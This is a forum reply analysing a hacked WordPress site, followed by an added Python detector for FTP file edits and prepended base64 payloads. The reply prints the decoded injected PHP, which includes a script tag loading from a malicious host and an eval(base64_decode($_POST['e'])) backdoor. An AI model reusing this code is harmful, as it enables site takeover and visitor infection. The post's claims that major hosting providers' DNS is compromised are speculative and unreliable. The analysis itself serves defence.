Forum Replies Created

  • Scan your system for a trojan. Do you find one?
    Did you happen to ever use SiteBuilder to edit your site?
    Do you use Hostgator, Godaddy or IXwebhosting.com for your provider?

    I will update more in the morning as I will be off work and can organize my notes better. To me it looks like some companies may have had their servers hacked into. I use hostgator and my site got hacked as well as many, many others. Just search for hostgator hacked, godaddy hacked, sitebuilder hacked, wordpress hacked, ecommerce hacked. Set your search to look for only posts in the past week. You will be shocked.

    From the looks of it some of these hosts got their database stolen and now it is being used to spread malware like crazy. The Butterfly trojan is exploding right now and Botnets are popping up like crazy.

    Bottom line… Accounts were stolen and now they are being used to host malware and cache poison to further spread the Botnets.

    Here is what I have time to post right now. I will post more in the morning when I have all my logs.

    Hey there.

    The same thing happened to my site and I am on the search for the ^$*&#) that did it, and mark my words I will find out. Here is what I have found so far.

    On Oct 23 someone used ftp to edit and modify my site files.

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php downloaded (33292 bytes, 1648.25KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-db.php uploaded (33304 bytes, 190.64KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-includes/wp-diff.php downloaded (12373 bytes, 212.57KB/sec)

    Oct 23 06:01:20 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/fantversion.php downloaded (36 bytes, 2.81KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php downloaded (2278 bytes, 43572.71KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/index.php uploaded (2290 bytes, 52.37KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/readme.html downloaded (7711 bytes, 446.11KB/sec)

    Oct 23 06:01:21 gator320 pure-ftpd: (username@72.41.223.230) [NOTICE] /home/username//public_html/username/wp-app.php downloaded (40543 bytes, 5860.32KB/sec)

    At the top of each of the replaced files was the following base_64. Here is the base_64 code decoded line by line.

    aWYoIWlzc2V0KCRjcG8xKSl7ZnVuY3Rpb24gY3BvKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk

    decodes to

    if(!isset($cpo1)){function cpo($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))

    Nsl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14

    decodes to

    <5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^

    decodes to

    ]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function cpo2($a,$b,$c,$d){global $cpo1;$s=array();if(function_exists($cpo1))call_user_func($cpo1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='cpo')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i

    “DO NOT GO TO THIS SITE IF YOU DO NOT KNOW WHAT YOU ARE DOING”
    This string from above is the winner. It decodes to “<script src=http: / / biobegley. Com/ tmp/ teamchallenge. Pdf. Php”. The file on this site is changing rapidly. It looks like the hacked site redirects to here, then this site gets the host name from the hacked site and passes back the malware to be installed. I have contacted ecommerce.com and they are looking into this site.

    I am in the process of tracking down these sites as well to find the source of this but it will take me a bit as I work a lot.

    ($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2Jpb2JlZ2xleS5jb20vdG1wL3RlYW1jaGFsbGVuZ2UucGRmLnBocCA+PC9zY3JpcHQ+')

    PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnY3BvJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGNwb2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2NwbzInKSkhPSdjcG8yJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs

    decodes to

    >=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('cpo');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$cpol=(($a=@set_error_handler('cpo2'))!='cpo2')?$a:0;eval(base64_decode($_POST['e']));

    The source of the initial ftp upload resolves to ecommerce.com. Ecommerce.com uses SiteBuilder from Ixwebhosting.com. It looks like many companies use Parallel.com’s SiteBuilder for web design.

    Parallel.com = 68.178.232.100…. 68.178.232.100 = Godaddy.com

    Right now a Whois for godaddy.com shows their nameservers are these.
    NameServer: CNS1.SECURESERVER.NET
    NameServer: CNS2.SECURESERVER.NET
    NameServer: CNS3.SECURESERVER.NET
    Look a little deeper into these name servers and we get this:
    CNS1.SECURESERVER.NET.LTCHOMETOWN.COM
    This DNS server is

    CNS1.SECURESERVER.NET.LTCHOMETOWN.COM whois resolves to this IP 216.21.231.87 which belongs to register.com. The hostname resolves to 208.109.14.24 and that belongs to GoDaddy.com as well.

    Secureserver.net's Whois looks like this for the nameservers.
    SECURESERVER.NET.TRAVELWITHINCOME.COM
    SECURESERVER.NET.STRICTLYMODIFIEDCUSTOMS.COM
    SECURESERVER.NET.ANTIGENICA.COM resolves to 216.239.32.21
    SECURESERVER.NET.ALTAOWBA.COM
    SECURESERVER.NET

    216.239.32.21 is now being flagged.

    The sites pointing to this IP that are also flagged for malware are below. Source: http://www.mywot.com/en/forum/4700-fake-bank-and-other-scams?comment=22019


    So you see this is a very very elaborate Botnet going on. I mean they have DNS poisoning
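As an added example (not code from the forum post, WordPress or any host named above), a Python check for the two things the post describes: a pure-ftpd log in which a file is downloaded and re-uploaded seconds later by the same client, and a PHP file whose top carries a base64 blob that decodes to eval()/$_POST code. The host, user, IP, paths and the blob are constructed placeholders in the post's log format, not values from the post.

```python
import base64
import re
from datetime import datetime
# pure-ftpd NOTICE line: "<Mon D HH:MM:SS> <host> pure-ftpd: (<user>@<ip>) [NOTICE] <path> downloaded|uploaded (<n> bytes, ..."
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd: \((?P<user>[^@]+)@(?P<ip>[\d.]+)\) "
    r"\[NOTICE\] (?P<path>\S+) (?P<action>downloaded|uploaded) \((?P<size>\d+) bytes"
)

def find_modified_files(lines, max_gap_seconds=60):
    """Return (path, ip, bytes_added) for each download that the same client follows with an
    upload of the same path within max_gap_seconds, i.e. an in-place edit over FTP."""
    last_download, hits = {}, []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; a fixed one keeps the subtraction valid within one log
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        key = (m["path"], m["ip"])
        if m["action"] == "downloaded":
            last_download[key] = (ts, int(m["size"]))
        elif key in last_download:
            dl_ts, dl_size = last_download.pop(key)
            if (ts - dl_ts).total_seconds() <= max_gap_seconds:
                hits.append((m["path"], m["ip"], int(m["size"]) - dl_size))
    return hits
SUSPICIOUS = ("eval(", "base64_decode(", "$_POST", "ob_start(", "set_error_handler(")

def decode_prepended_base64(php_source):
    """Decode the first long base64 run near the top of a PHP file and list which suspicious
    constructs the decoded text contains (empty list when there is none or it will not decode)."""
    m = re.search(r"[A-Za-z0-9+/]{40,}={0,2}", php_source[:4096])
    if not m:
        return []
    blob = m.group(0)
    try:
        decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("latin-1")
    except ValueError:
        return []
    return [s for s in SUSPICIOUS if s in decoded]
# Constructed sample input in the post's log format (placeholder host, user, IP and paths).
SAMPLE_LOG = [
    "Oct 23 06:01:20 host1 pure-ftpd: (user@198.51.100.7) [NOTICE] /home/user/public_html/wp-includes/wp-db.php downloaded (33292 bytes, 1648.25KB/sec)",
    "Oct 23 06:01:20 host1 pure-ftpd: (user@198.51.100.7) [NOTICE] /home/user/public_html/wp-includes/wp-db.php uploaded (33304 bytes, 190.64KB/sec)",
    "Oct 23 06:01:21 host1 pure-ftpd: (user@198.51.100.7) [NOTICE] /home/user/public_html/readme.html downloaded (7711 bytes, 446.11KB/sec)",
]
# Constructed stand-in for a prepended blob: a base64-wrapped eval($_POST) stub, built at runtime.
SAMPLE_PHP = ("<?php eval(base64_decode('" + base64.b64encode(
    b"if(isset($_POST['e']))eval(base64_decode($_POST['e']));").decode() + "')); ?>\n<?php // site code\n")
```

A download followed by an upload of the same path that grows by a few bytes, as in the sample, is the pattern the post's own log shows for wp-db.php and index.php.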